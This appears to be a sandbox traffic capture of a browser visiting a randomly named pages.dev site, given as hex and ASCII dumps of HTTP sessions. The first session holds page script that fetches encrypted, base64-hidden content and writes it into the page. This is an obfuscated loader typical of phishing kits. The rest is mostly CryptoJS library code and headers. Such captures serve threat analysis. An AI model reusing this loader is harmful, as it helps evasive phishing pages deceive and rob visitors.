                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfab22ec0187d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:36 UTC587INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:03:36 UTC1369INData Raw: 37 39 70 78 3b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 39 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 70 78 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 68 61 64 6f 77 2d 66 61 64 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 32 31 2e 32 25 2c 20 38 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 34 37 25 2c 20 37 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 31 3b 7d 7d 23 68 61 62 69 74 61 74 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 39 70 78 3b 7d 23 68 61 69 6c 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 20 30 20 37 70 78 20 37 70 78 3b
                                                                Data Ascii: 79px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7px 7px;
                                                                2024-08-27 18:03:36 UTC1369INData Raw: 33 33 70 78 3b 68 65 69 67 68 74 3a 20 33 38 70 78 3b 7d 2e 77 61 69 6e 73 63 6f 74 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 37 33 63 63 3b 7d 2e 69 63 68 74 68 79 6f 6c 6f 67 69 73 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 61 30 65 30 3b 7d 2e 69 63 6f 6e 6f 67 72 61 70 68 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 66 63 66 66 66 3b 7d 2e 61 62 64 75 63 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 33 35 66 62 33 3b 7d 2e 6b 61 79 61 6b 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 33 34 32 37 36 3b 7d 23 64 61 68 6c 69 61 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 70 65 6e 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73
                                                                Data Ascii: 33px;height: 38px;}.wainscoting {background: #0073cc;}.ichthyologist {background: #27a0e0;}.iconography {background: #4fcfff;}.abduct {background: #035fb3;}.kayaking {background: #134276;}#dahlia {width: 130px;height: 107px;animation: opened-flap-swing 5s
                                                                2024-08-27 18:03:36 UTC1369INData Raw: 61 6e 64 20 70 65 72 73 65 76 65 72 61 6e 63 65 2e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 69 63 65 64 22 20 68 69 64 64 65 6e 3e 3c 64 69 76 20 69 64 3d 22 68 61 62 69 74 61 74 22 3e 3c 64 69 76 20 69 64 3d 22 64 61 68 6c 69 61 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 63 61 62 69 6e 65 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 61 63 6b 73 74 72 61 77 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 61 73 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 6f 69 64 20 77 61 69 6e 73 63 6f 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                Data Ascii: and perseverance. --><div id="iced" hidden><div id="habitat"><div id="dahlia"><div id="backdrop"><div class="laconic"></div></div></div><div id="cabinet"><div class="jackstraw"></div><div class="abash"><div class="tabloid wainscoting"></div><div class=
                                                                2024-08-27 18:03:36 UTC1256INData Raw: 69 63 65 64 2e 68 69 64 64 65 6e 20 3d 20 30 3b 0d 0a 09 09 79 65 61 72 6e 2e 68 69 64 64 65 6e 20 3d 20 31 3b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 77 61 69 74 20 28 61 77 61 69 74 20 66 65 74 63 68 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 74 6f 62 28 60 65 79 4a 68 49 6a 6f 69 63 56 52 54 55 30 6c 78 65 55 68 6d 57 58 63 34 61 6a 52 53 59 58 70 57 4f 46 5a 54 51 30 5a 31 55 30 35 6c 54 43 74 63 4c 32 34 79 57 6c 46 75 64 45 31 50 56 7a 42 49 56 44 67 39 49 69 77 69 59 79 49 36 49 6a 6b 32 5a 6a 6b 34 59 7a 67 30 4d 6d 46 6d 4f 54 4a 6a 4e 54 4a 6b 4e 44 46 6a 4f 47 51 32 59 6a 55 78 5a 44 51 31 4f 54 63 32 49 69 77 69 59 69 49 36 49 6a 63 32 59 7a 4e 69 4e 6d 4e 6b
                                                                Data Ascii: iced.hidden = 0;yearn.hidden = 1; document.write(await labored(await (await fetch(await labored(atob(`eyJhIjoicVRTU0lxeUhmWXc4ajRSYXpWOFZTQ0Z1U05lTCtcL24yWlFudE1PVzBIVDg9IiwiYyI6Ijk2Zjk4Yzg0MmFmOTJjNTJkNDFjOGQ2YjUxZDQ1OTc2IiwiYiI6Ijc2YzNiNmNk
                                                                2024-08-27 18:03:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.1649738104.17.24.144433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:37 UTC608OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:37 UTC960INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:37 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb03e2d-bb78"
                                                                Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 425318
                                                                Expires: Sun, 17 Aug 2025 18:03:37 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbG2nHXZv37Pde6H3CJO1X0HpHf49jGb4zGL0DCLUk3j5cDyNGADWdSA%2BRZJiEonpdfMcldfsXyfNPtE%2FhNSa7Qh8hxAgi%2BRUAy8%2BrghoixBeov2VqkUxJKFqQ2XSwH4CV3OhNdU"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfab69826c47a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:37 UTC409INData Raw: 37 62 65 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 7be9!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63
                                                                Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63
                                                                Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30
                                                                Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30
                                                                Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36
                                                                Data Ascii: -o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29
                                                                Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c
                                                                Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
                                                                2024-08-27 18:03:37 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                                                Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.1649739104.18.95.414433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:37 UTC590OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:37 UTC386INHTTP/1.1 302 Found
                                                                Date: Tue, 27 Aug 2024 18:03:37 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                cross-origin-resource-policy: cross-origin
                                                                location: /turnstile/v0/b/6790c32b9fc9/api.js
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfab69cccc337-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.1649740104.18.95.414433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:37 UTC605OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:38 UTC471INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:37 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 45035
                                                                Connection: close
                                                                accept-ranges: bytes
